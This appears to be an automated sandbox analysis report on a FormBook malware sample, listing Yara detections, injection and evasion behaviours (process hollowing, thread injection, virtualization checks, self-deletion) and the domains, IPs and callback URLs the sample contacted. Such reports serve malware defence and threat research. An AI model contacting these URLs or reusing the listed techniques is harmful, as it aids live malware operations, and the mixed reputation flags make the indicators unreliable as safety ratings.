Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 562399 Sample: GV8EJooYMIgEnEk.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 10 GV8EJooYMIgEnEk.exe 3 2->10         started        process3 file4 28 C:\Users\user\...behaviorgraphV8EJooYMIgEnEk.exe.log, ASCII 10->28 dropped 54 Tries to detect virtualization through RDTSC time measurements 10->54 56 Injects a PE file into a foreign processes 10->56 14 GV8EJooYMIgEnEk.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.experiencedlawfirms.com 166.88.62.202, 49816, 80 EGIHOSTINGUS United States 17->30 32 www.totalwinerewards.com 199.59.243.200, 49817, 80 BODIS-NJUS United States 17->32 34 8 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 chkdsk.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.252.151.235
 webarate.com Italy
60087 ASSUPERNOVAIT true
166.88.62.202
 www.experiencedlawfirms.com United States
18779 EGIHOSTINGUS true
18.231.72.25
 www.bitconga.com United States
16509 AMAZON-02US true
34.102.136.180
 omnipets.store United States
15169 GOOGLEUS false
199.59.243.200
 www.totalwinerewards.com United States
395082 BODIS-NJUS true

Contacted Domains

Name IP Active
www.bitconga.com 18.231.72.25 true
webarate.com 46.252.151.235 true
omnipets.store 34.102.136.180 true
www.totalwinerewards.com 199.59.243.200 true
www.experiencedlawfirms.com 166.88.62.202 true
casatowerofficial.com 34.102.136.180 true
www.casatowerofficial.com unknown unknown
www.webarate.com unknown unknown
www.tothelaundry.com unknown unknown
www.omnipets.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 false
  • Avira URL Cloud: safe
 unknown
http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 true
  • Avira URL Cloud: safe
 unknown
www.cottoneworld.com/cbgo/ true
  • Avira URL Cloud: malware
 low
http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf false
  • Avira URL Cloud: malware
 unknown
http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 true
  • Avira URL Cloud: safe
 unknown